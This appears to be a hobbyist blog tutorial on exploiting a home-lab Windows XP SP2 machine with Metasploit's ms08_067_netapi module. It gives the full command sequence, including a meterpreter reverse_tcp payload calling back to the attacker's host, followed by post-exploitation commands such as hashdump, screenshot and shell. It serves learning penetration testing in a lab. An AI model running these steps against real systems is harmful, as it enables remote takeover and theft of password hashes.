This time I have been playing with metasploit and wow, it's pretty cool. Obviously this is quite well used, known and regularly updated. As it is the first time that I have used it I decided to make a vid and quick tutorial on how to do it.
So, first off, I set up a vulnerable xp sp2 box, the vulnerability being that Microsoft made it, teehee!
Then I used backtrack 4 with metasploit installed to use the ms08_067_netapi exploit.
Firstly update the framework:
cd /pentest/exploits/framework3 svn up
Once this has finished hit cd to get back to root:
nmap -O 192.168.0.1 msfconsole use exploit/windows/smb/ms08_067_netapi set RHOST 192.168.0.127 (This is the victims I.P.) set PAYLOAD windows/meterpreter/reverse_tcp show options set LHOST (I.P. of your pc) exploit (this runs the exploit)If all went well you should have a meterpreter shell open.
I then used some of the commands within the meterpreter to see how good it was!
sysinfo ipconfig help hashdump screenshot shell